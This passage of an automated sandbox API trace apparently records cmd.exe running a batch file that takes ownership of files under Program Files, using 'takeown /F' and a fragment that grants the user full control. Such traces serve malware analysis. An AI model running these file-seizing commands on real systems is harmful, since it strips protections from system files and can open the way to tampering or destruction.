returned 0x374bd0 [0214.356] GetProcessHeap () returned 0x350000 [0214.356] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0214.358] _tell (_FileHandle=3) returned 47 [0214.358] _close (_FileHandle=3) returned 0 [0214.359] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f47c | out: _Buffer="\r\n") returned 2 [0214.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.359] GetFileType (hFile=0x7) returned 0x2 [0214.359] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.359] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f43c | out: lpMode=0x34f43c) returned 1 [0214.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.360] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f468, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f468*=0x2) returned 1 [0214.361] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0214.361] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0214.361] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x34f478 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0214.362] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x34f478 | out: _Buffer=">") returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.362] GetFileType (hFile=0x7) returned 0x2 [0214.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.362] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f440 | out: lpMode=0x34f440) returned 1 [0214.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.362] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f46c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x34f46c*=0x26) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.363] GetFileType (hFile=0x7) returned 0x2 [0214.363] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.363] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6c4 | out: lpMode=0x34f6c4) returned 1 [0214.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.363] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3512b0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x34f6f0, lpReserved=0x0 | out: lpBuffer=0x3512b0*, lpNumberOfCharsWritten=0x34f6f0*=0x7) returned 1 [0214.364] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f6fc | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\" ") returned 68 [0214.364] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.364] GetFileType (hFile=0x7) returned 0x2 [0214.364] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.364] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0214.365] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.365] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x44) returned 1 [0214.367] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f71c | out: _Buffer="\r\n") returned 2 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.367] GetFileType (hFile=0x7) returned 0x2 [0214.367] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0214.367] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6dc | out: lpMode=0x34f6dc) returned 1 [0214.367] _get_osfhandle (_FileHandle=1) returned 0x7 [0214.367] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f708, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f708*=0x2) returned 1 [0214.369] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0214.369] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0214.369] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0214.369] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0214.369] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0214.369] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0214.369] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0214.369] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0214.369] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0214.369] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0214.369] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0214.369] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0214.369] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0214.369] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0214.369] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0214.369] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0214.369] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0214.369] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0214.369] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0214.370] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0214.370] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0214.370] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0214.370] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0214.370] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0214.370] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0214.370] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0214.370] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0214.370] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0214.370] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0214.370] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0214.370] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0214.370] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0214.370] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0214.370] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0214.370] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0214.370] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0214.370] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0214.370] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0214.370] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0214.370] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0214.370] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0214.370] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0214.371] GetConsoleTitleW (in: lpConsoleTitle=0x34f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.372] GetConsoleTitleW (in: lpConsoleTitle=0x34f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.372] InitializeProcThreadAttributeList (in: lpAttributeList=0x34eea8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x34ef70 | out: lpAttributeList=0x34eea8, lpSize=0x34ef70) returned 1 [0214.372] UpdateProcThreadAttribute (in: lpAttributeList=0x34eea8, dwFlags=0x0, Attribute=0x60001, lpValue=0x34ef68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x34eea8, lpPreviousValue=0x0) returned 1 [0214.372] GetStartupInfoW (in: lpStartupInfo=0x34ee64 | out: lpStartupInfo=0x34ee64*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0214.568] CloseHandle (hObject=0x74) returned 1 [0214.568] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.568] GetProcessHeap () returned 0x350000 [0214.568] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3681a8 | out: hHeap=0x350000) returned 1 [0214.568] GetEnvironmentStringsW () returned 0x365fc0* [0214.568] GetProcessHeap () returned 0x350000 [0214.568] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3681a8 [0214.568] FreeEnvironmentStringsW (penv=0x365fc0) returned 1 [0214.568] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0220.450] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x34ee44 | out: lpExitCode=0x34ee44*=0x0) returned 1 [0220.451] CloseHandle (hObject=0x78) returned 1 [0220.451] _vsnwprintf (in: _Buffer=0x34ef8c, _BufferCount=0x13, _Format="%08X", _ArgList=0x34ee50 | out: _Buffer="00000000") returned 8 [0220.451] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0220.451] GetProcessHeap () returned 0x350000 [0220.451] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3681a8 | out: hHeap=0x350000) returned 1 [0220.452] GetEnvironmentStringsW () returned 0x365fc0* [0220.452] GetProcessHeap () returned 0x350000 [0220.452] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3681a8 [0220.452] FreeEnvironmentStringsW (penv=0x365fc0) returned 1 [0220.452] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0220.452] GetProcessHeap () returned 0x350000 [0220.452] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3681a8 | out: hHeap=0x350000) returned 1 [0220.452] GetEnvironmentStringsW () returned 0x365fc0* [0220.452] GetProcessHeap () returned 0x350000 [0220.452] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb5c) returned 0x3681a8 [0220.452] FreeEnvironmentStringsW (penv=0x365fc0) returned 1 [0220.452] GetProcessHeap () returned 0x350000 [0220.452] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x350000) returned 1 [0220.452] DeleteProcThreadAttributeList (in: lpAttributeList=0x34eea8 | out: lpAttributeList=0x34eea8) [0220.452] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.452] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.453] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0220.454] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.454] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0220.454] SetConsoleInputExeNameW () returned 0x1 [0220.454] GetConsoleOutputCP () returned 0x1b5 [0220.455] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0220.455] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.455] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x34f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0220.456] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0220.456] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.456] SetFilePointer (in: hFile=0x78, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0220.456] GetProcessHeap () returned 0x350000 [0220.456] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364a98 | out: hHeap=0x350000) returned 1 [0220.456] GetProcessHeap () returned 0x350000 [0220.456] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364968 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364840 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364d18 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364798 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364580 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364500 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3643d0 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3642a8 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364238 | out: hHeap=0x350000) returned 1 [0220.457] GetProcessHeap () returned 0x350000 [0220.457] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3641a0 | out: hHeap=0x350000) returned 1 [0220.458] GetProcessHeap () returned 0x350000 [0220.458] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3512a8 | out: hHeap=0x350000) returned 1 [0220.458] GetProcessHeap () returned 0x350000 [0220.458] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351248 | out: hHeap=0x350000) returned 1 [0220.458] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.458] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0220.458] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x34f6a8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x34f6a8*=0xb3, lpOverlapped=0x0) returned 1 [0220.458] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0220.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=16, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="set FN=\"%~nx1\"\r\nUSERNAME%:F /C\r\n") returned 16 [0220.459] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.459] GetFileType (hFile=0x78) returned 0x1 [0220.459] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.459] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0220.459] GetProcessHeap () returned 0x350000 [0220.459] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x400a) returned 0x374bd0 [0220.460] GetProcessHeap () returned 0x350000 [0220.460] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x86) returned 0x3641a0 [0220.460] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", nBufferLength=0x208, lpBuffer=0x34ee38, lpFilePart=0x34ee30 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", lpFilePart=0x34ee30*="Month_Calendar.jtp") returned 0x3d [0220.460] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41dc500, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x41dc500, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x351248 [0220.461] FindClose (in: hFindFile=0x351248 | out: hFindFile=0x351248) returned 1 [0220.461] _wcsnicmp (_String1="PROGRA~1", _String2="Program Files", _MaxCount=0xd) returned 17 [0220.461] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 0x351248 [0220.461] FindClose (in: hFindFile=0x351248 | out: hFindFile=0x351248) returned 1 [0220.461] _wcsnicmp (_String1="WI0FCF~1", _String2="Windows Journal", _MaxCount=0xf) returned -62 [0220.461] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e472dd2, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e4e551f, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0x351248 [0220.461] FindClose (in: hFindFile=0x351248 | out: hFindFile=0x351248) returned 1 [0220.462] _wcsnicmp (_String1="TEMPLA~1", _String2="Templates", _MaxCount=0x9) returned 10 [0220.462] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", lpFindFileData=0x34eb4c | out: lpFindFileData=0x34eb4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc56a1992, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc56a1992, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x47ea8dd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x275c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Month_Calendar.jtp", cAlternateFileName="")) returned 0x351248 [0220.462] FindClose (in: hFindFile=0x351248 | out: hFindFile=0x351248) returned 1 [0220.462] GetProcessHeap () returned 0x350000 [0220.462] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x2e) returned 0x351248 [0220.462] GetProcessHeap () returned 0x350000 [0220.462] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x374bd0 | out: hHeap=0x350000) returned 1 [0220.466] _tell (_FileHandle=3) returned 63 [0220.466] _close (_FileHandle=3) returned 0 [0220.466] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f47c | out: _Buffer="\r\n") returned 2 [0220.466] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.466] GetFileType (hFile=0x7) returned 0x2 [0220.467] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.467] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f43c | out: lpMode=0x34f43c) returned 1 [0220.468] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.468] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f468, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f468*=0x2) returned 1 [0220.470] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0220.470] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x34f478 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0220.471] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x34f478 | out: _Buffer=">") returned 1 [0220.471] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.471] GetFileType (hFile=0x7) returned 0x2 [0220.471] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.471] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f440 | out: lpMode=0x34f440) returned 1 [0220.472] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.472] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x34f46c, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x34f46c*=0x26) returned 1 [0220.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.473] GetFileType (hFile=0x7) returned 0x2 [0220.473] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.473] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6c4 | out: lpMode=0x34f6c4) returned 1 [0220.474] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.474] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x350dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x34f6f0, lpReserved=0x0 | out: lpBuffer=0x350dc0*, lpNumberOfCharsWritten=0x34f6f0*=0x3) returned 1 [0220.474] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x34f6fc | out: _Buffer=" FN=\"Month_Calendar.jtp\" ") returned 25 [0220.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.475] GetFileType (hFile=0x7) returned 0x2 [0220.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6bc | out: lpMode=0x34f6bc) returned 1 [0220.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.476] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x34f6e8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f6e8*=0x19) returned 1 [0220.476] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x34f71c | out: _Buffer="\r\n") returned 2 [0220.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.476] GetFileType (hFile=0x7) returned 0x2 [0220.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.477] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x34f6dc | out: lpMode=0x34f6dc) returned 1 [0220.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.477] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x34f708, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x34f708*=0x2) returned 1 [0220.480] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0220.480] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0220.480] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0220.480] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0220.480] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0220.480] _wcsicmp (_String1="set", _String2="CD") returned 16 [0220.480] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0220.480] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0220.480] _wcsicmp (_String1="set", _String2="REN") returned 1 [0220.480] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0220.480] _wcsicmp (_String1="set", _String2="SET") returned 0 [0220.480] GetConsoleTitleW (in: lpConsoleTitle=0x34f28c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.481] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0220.482] SetEnvironmentVariableW (lpName="FN", lpValue="\"Month_Calendar.jtp\"") returned 1 [0220.482] GetProcessHeap () returned 0x350000 [0220.482] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3681a8 | out: hHeap=0x350000) returned 1 [0220.482] GetEnvironmentStringsW () returned 0x366b58* [0220.482] GetProcessHeap () returned 0x350000 [0220.482] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb8c) returned 0x3676f0 [0220.482] FreeEnvironmentStringsW (penv=0x366b58) returned 1 [0220.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.483] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.483] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0220.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0220.484] SetConsoleInputExeNameW () returned 0x1 [0220.484] GetConsoleOutputCP () returned 0x1b5 [0220.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0220.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.485] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x34f6c4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0220.486] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0220.486] _get_osfhandle (_FileHandle=3) returned 0x78 [0220.486] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0220.486] GetProcessHeap () returned 0x350000 [0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3642d8 | out: hHeap=0x350000) returned 1 [0220.486] GetProcessHeap () returned 0x350000 [0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364290 | out: hHeap=0x350000) returned 1 [0220.486] GetProcessHeap () returned 0x350000 [0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x351280 | out: hHeap=0x350000) returned 1 [0220.486] GetProcessHeap () returned 0x350000 [0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x350db8 | out: hHeap=0x350000) returned 1 [0220.486] GetProcessHeap () returned 0x350000 [0220.486] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x364230 | out: hHeap=0x350000) returned 1 [0220.486] GetProcessHeap () returned 0x350000 